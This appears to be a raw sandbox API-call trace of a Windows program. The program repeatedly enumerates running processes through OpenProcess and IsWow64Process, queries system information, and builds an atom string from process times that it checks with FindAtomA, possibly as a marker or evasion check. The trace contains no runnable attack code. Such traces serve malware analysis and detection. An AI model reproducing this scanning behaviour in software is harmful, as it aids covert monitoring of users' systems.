	[0085.607] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0085.607] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0085.607] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0085.608] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0085.608] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0085.608] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0085.608] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0085.608] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0085.608] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0085.608] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0085.608] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0085.609] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0085.609] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0085.609] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x69c
	[0085.609] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.609] CloseHandle (hObject=0x69c) returned 1
	[0085.609] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0085.609] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0085.609] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x69c
	[0085.609] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.609] CloseHandle (hObject=0x69c) returned 1
	[0085.609] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0085.610] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x69c
	[0085.610] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.610] CloseHandle (hObject=0x69c) returned 1
	[0085.610] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x69c
	[0085.610] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.610] CloseHandle (hObject=0x69c) returned 1
	[0085.610] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x69c
	[0085.610] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.610] CloseHandle (hObject=0x69c) returned 1
	[0085.610] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x69c
	[0085.610] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.610] CloseHandle (hObject=0x69c) returned 1
	[0085.610] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x69c
	[0085.610] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.610] CloseHandle (hObject=0x69c) returned 1
	[0085.611] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x69c
	[0085.611] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.611] CloseHandle (hObject=0x69c) returned 1
	[0085.611] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0085.611] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x69c
	[0085.611] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.611] CloseHandle (hObject=0x69c) returned 1
	[0085.611] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x69c
	[0085.611] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.611] CloseHandle (hObject=0x69c) returned 1
	[0085.611] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x69c
	[0085.611] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.611] CloseHandle (hObject=0x69c) returned 1
	[0085.611] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0085.612] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x69c
	[0085.612] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.612] CloseHandle (hObject=0x69c) returned 1
	[0085.612] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x69c
	[0085.612] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.612] CloseHandle (hObject=0x69c) returned 1
	[0085.612] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x69c
	[0085.612] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.612] CloseHandle (hObject=0x69c) returned 1
	[0085.612] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x69c
	[0085.612] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.612] CloseHandle (hObject=0x69c) returned 1
	[0085.612] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x69c
	[0085.612] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.612] CloseHandle (hObject=0x69c) returned 1
	[0085.613] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x69c
	[0085.613] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.613] CloseHandle (hObject=0x69c) returned 1
	[0085.613] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x69c
	[0085.613] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.613] CloseHandle (hObject=0x69c) returned 1
	[0085.613] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x69c
	[0085.613] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.613] CloseHandle (hObject=0x69c) returned 1
	[0085.613] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x69c
	[0085.613] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.613] CloseHandle (hObject=0x69c) returned 1
	[0085.613] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x69c
	[0085.613] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.613] CloseHandle (hObject=0x69c) returned 1
	[0085.613] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x69c
	[0085.613] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.613] CloseHandle (hObject=0x69c) returned 1
	[0085.614] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x69c
	[0085.614] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.614] CloseHandle (hObject=0x69c) returned 1
	[0085.614] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x69c
	[0085.614] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.614] CloseHandle (hObject=0x69c) returned 1
	[0085.614] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x69c
	[0085.614] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.614] CloseHandle (hObject=0x69c) returned 1
	[0085.614] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x69c
	[0085.614] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.614] CloseHandle (hObject=0x69c) returned 1
	[0085.614] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x69c
	[0085.614] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.614] CloseHandle (hObject=0x69c) returned 1
	[0085.614] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x69c
	[0085.614] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.614] CloseHandle (hObject=0x69c) returned 1
	[0085.615] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x69c
	[0085.615] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.615] CloseHandle (hObject=0x69c) returned 1
	[0085.615] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x69c
	[0085.615] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.615] CloseHandle (hObject=0x69c) returned 1
	[0085.615] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x69c
	[0085.615] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.615] CloseHandle (hObject=0x69c) returned 1
	[0085.615] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x69c
	[0085.615] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0085.615] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0085.616] GetProcessTimes (in: hProcess=0x69c, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0085.616] wsprintfA (in: param_1=0x3976208, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0085.616] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0085.616] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0085.616] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0085.617] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0085.617] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0085.617] CloseHandle (hObject=0x69c) returned 1
	[0085.617] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0085.617] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0085.617] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x69c
	[0085.617] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.617] CloseHandle (hObject=0x69c) returned 1
	[0085.617] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0085.617] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe6c) returned 0x69c
	[0085.617] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.617] CloseHandle (hObject=0x69c) returned 1
	[0085.698] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x17118) returned 0xc0000004
	[0085.698] VirtualAlloc (lpAddress=0x0, dwSize=0x17218, flAllocationType=0x3000, flProtect=0x4) returned 0x3bf0000
	[0085.699] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3bf0000, Length=0x17218, ResultLength=0x0 | out: SystemInformation=0x3bf0000, ResultLength=0x0) returned 0x0
	[0085.701] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0085.701] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0085.701] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0085.701] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0085.701] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0085.702] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0085.702] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0085.702] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0085.702] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0085.702] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0085.702] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0085.702] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0085.702] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0085.702] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0085.703] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0085.703] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0085.703] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0085.703] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0085.703] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x69c
	[0085.703] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.703] CloseHandle (hObject=0x69c) returned 1
	[0085.703] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0085.703] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0085.704] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x69c
	[0085.704] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.704] CloseHandle (hObject=0x69c) returned 1
	[0085.704] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0085.704] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x69c
	[0085.704] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.704] CloseHandle (hObject=0x69c) returned 1
	[0085.704] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x69c
	[0085.704] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.704] CloseHandle (hObject=0x69c) returned 1
	[0085.704] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x69c
	[0085.704] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.704] CloseHandle (hObject=0x69c) returned 1
	[0085.704] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x69c
	[0085.704] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.704] CloseHandle (hObject=0x69c) returned 1
	[0085.705] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x69c
	[0085.705] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.705] CloseHandle (hObject=0x69c) returned 1
	[0085.705] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x69c
	[0085.705] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.705] CloseHandle (hObject=0x69c) returned 1
	[0085.705] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0085.705] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x69c
	[0085.705] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.705] CloseHandle (hObject=0x69c) returned 1
	[0085.705] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x69c
	[0085.705] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.705] CloseHandle (hObject=0x69c) returned 1
	[0085.705] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x69c
	[0085.705] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.705] CloseHandle (hObject=0x69c) returned 1
	[0085.705] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0085.706] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x69c
	[0085.706] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.706] CloseHandle (hObject=0x69c) returned 1
	[0085.706] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x69c
	[0085.706] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.706] CloseHandle (hObject=0x69c) returned 1
	[0085.706] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x69c
	[0085.706] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.706] CloseHandle (hObject=0x69c) returned 1
	[0085.706] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x69c
	[0085.706] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.706] CloseHandle (hObject=0x69c) returned 1
	[0085.706] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x69c
	[0085.706] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.706] CloseHandle (hObject=0x69c) returned 1
	[0085.706] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x69c
	[0085.706] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.707] CloseHandle (hObject=0x69c) returned 1
	[0085.707] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x69c
	[0085.707] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.707] CloseHandle (hObject=0x69c) returned 1
	[0085.707] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x69c
	[0085.707] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.707] CloseHandle (hObject=0x69c) returned 1
	[0085.707] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x69c
	[0085.707] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.707] CloseHandle (hObject=0x69c) returned 1
	[0085.707] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x69c
	[0085.707] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.707] CloseHandle (hObject=0x69c) returned 1
	[0085.707] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x69c
	[0085.707] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.707] CloseHandle (hObject=0x69c) returned 1
	[0085.707] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x69c
	[0085.708] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.708] CloseHandle (hObject=0x69c) returned 1
	[0085.708] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x69c
	[0085.708] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.708] CloseHandle (hObject=0x69c) returned 1
	[0085.708] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x69c
	[0085.708] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.708] CloseHandle (hObject=0x69c) returned 1
	[0085.708] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x69c
	[0085.708] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.708] CloseHandle (hObject=0x69c) returned 1
	[0085.708] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x69c
	[0085.708] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.708] CloseHandle (hObject=0x69c) returned 1
	[0085.708] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x69c
	[0085.708] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.708] CloseHandle (hObject=0x69c) returned 1
	[0085.709] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x69c
	[0085.709] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.709] CloseHandle (hObject=0x69c) returned 1
	[0085.709] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x69c
	[0085.709] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.709] CloseHandle (hObject=0x69c) returned 1
	[0085.709] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x69c
	[0085.709] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.709] CloseHandle (hObject=0x69c) returned 1
	[0085.709] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x69c
	[0085.709] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0085.710] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0085.710] GetProcessTimes (in: hProcess=0x69c, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0085.710] wsprintfA (in: param_1=0x3976208, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0085.710] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0085.710] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0085.710] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0085.710] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0085.710] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0085.711] CloseHandle (hObject=0x69c) returned 1
	[0085.711] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0085.711] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0085.711] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x69c
	[0085.711] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.711] CloseHandle (hObject=0x69c) returned 1
	[0085.711] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0085.711] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe6c) returned 0x69c
	[0085.711] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.711] CloseHandle (hObject=0x69c) returned 1
	[0085.775] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x17258) returned 0xc0000004
	[0085.824] VirtualAlloc (lpAddress=0x0, dwSize=0x17358, flAllocationType=0x3000, flProtect=0x4) returned 0x3bf0000
	[0085.824] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3bf0000, Length=0x17358, ResultLength=0x0 | out: SystemInformation=0x3bf0000, ResultLength=0x0) returned 0x0
	[0085.850] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0085.850] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0085.850] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0085.850] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0085.850] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0085.851] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0085.851] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0085.851] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0085.851] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0085.851] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0085.851] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
